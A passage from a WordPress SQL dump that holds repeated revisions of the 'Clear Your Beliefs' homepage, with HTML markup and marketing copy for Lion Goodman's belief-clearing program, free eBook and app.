(1837, 2, '2014-11-20 19:27:57', '2014-11-21 00:27:57', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><strong>Clear Your Limiting and\nNegative Beliefs</strong> <strong>\n- Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach? Therapist? Healer? Change Agent?</h3>\n<p style="text-align: center">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman\n© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 19:27:57', '2014-11-21 00:27:57', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1838, 2, '2014-11-20 19:28:24', '2014-11-21 00:28:24', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\nFree eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>\n\nFIRST NAME *\nEMAIL *\n\nFree App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px; line-height: 20px;padding-bottom: 23px;"><strong>Clear Your Limiting and\nNegative Beliefs</strong> <strong>\n- Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman\n&nbsp;', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-20 19:28:24', '2014-11-21 00:28:24', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1839, 2, '2014-11-20 19:47:23', '2014-11-21 00:47:23', '', 'cyb-3rd-head', '', 'inherit', 'closed', 'open', '', 'cyb-3rd-head', '', '', '2014-11-20 19:47:23', '2014-11-21 00:47:23', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg', 0, 'attachment', 'image/jpeg', 0),
(1840, 2, '2014-11-20 19:47:50', '2014-11-21 00:47:50', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limitingand Negative Beliefs</strong> <strong>- Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 19:47:50', '2014-11-21 00:47:50', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1841, 2, '2014-11-20 19:49:25', '2014-11-21 00:49:25', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 19:49:25', '2014-11-21 00:49:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1842, 2, '2014-11-20 19:53:46', '2014-11-21 00:53:46', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px">What do I want to experience?</em>\n<em style="margin-left: -6px">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-20 19:53:46', '2014-11-21 00:53:46', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1843, 2, '2014-11-20 19:55:00', '2014-11-21 00:55:00', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting\nand Negative Beliefs</strong> <strong>\n- Permanently!</strong>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em style="margin-left: -6px;">What do I want to experience?</em>\n<em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em>\n<em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  